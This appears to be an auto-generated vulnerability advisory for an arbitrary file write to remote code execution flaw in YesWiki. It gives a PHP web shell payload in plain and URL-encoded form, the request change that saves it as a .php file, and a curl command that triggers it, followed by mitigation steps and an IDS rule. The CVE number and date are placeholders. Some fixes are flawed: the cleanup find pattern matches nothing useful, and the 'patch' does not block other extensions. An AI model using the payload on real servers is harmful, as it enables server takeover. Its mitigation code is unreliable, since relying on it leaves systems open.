YesWiki, Arbitrary File Write to RCE, CVE-2023-XXXX (Critical)

By /

Listen to this Post

How the CVE Works

The vulnerability arises from insufficient validation in YesWiki’s file-upload functionality, allowing attackers to write arbitrary files with a `.php` extension. By intercepting a legitimate CSS template save request via a proxy (e.g., Burp Suite), an attacker can modify the filename to `.php` and inject PHP code into a parameter (e.g., primary-color=<?php system($_GET['cmd']); ?>). The server saves the malicious file to a web-accessible directory (e.g., /var/www/html/custom/css-presets/), enabling remote code execution (RCE) by accessing the file with a `cmd` parameter (e.g., pizzapower.php?cmd=id). This exploit chain combines arbitrary file write with weak server configuration (PHP execution in writable directories).

DailyCVE Form

Platform: YesWiki
Version: Latest
Vulnerability: Arbitrary File Write → RCE
Severity: Critical
Date: 2023-XX-XX

What Undercode Say:

Exploitation:

1. Intercept Request:

burpsuite

Modify `POST /?api/templates/custom-presets/test.css` to `.php`.

2. Inject PHP Payload:

primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E

3. Trigger RCE:

curl http://localhost:8085/custom/css-presets/pizzapower.php?cmd=id

Mitigation:

1. Restrict Extensions:

$allowed_ext = ['css'];
if (!in_array($ext, $allowed_ext)) { die("Invalid extension"); }

2. Disable PHP in Writable Dirs:

<Directory /var/www/html/custom/css-presets>
php_admin_flag engine off
</Directory>

3. Patch Analysis:

- $filename = $_REQUEST['file'];
+ $filename = basename($_REQUEST['file'], '.css');

4. Log Monitoring:

tail -f /var/log/apache2/access.log | grep '.php'

5. Exploit Detection (IDS Rule):

alert http any any -> any any (msg:"YesWiki RCE Attempt"; content:"system($_GET"; http_client_body; sid:10001;)

6. Cleanup Exploited Files:

find /var/www/html/custom/css-presets -name ".php" -delete

7. Hardening:

chown -R root:www-data /var/www/html/custom/css-presets
chmod 750 /var/www/html/custom/css-presets

8. Test Fixes:

wget http://localhost:8085/custom/css-presets/test.php && echo "Vulnerable"

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top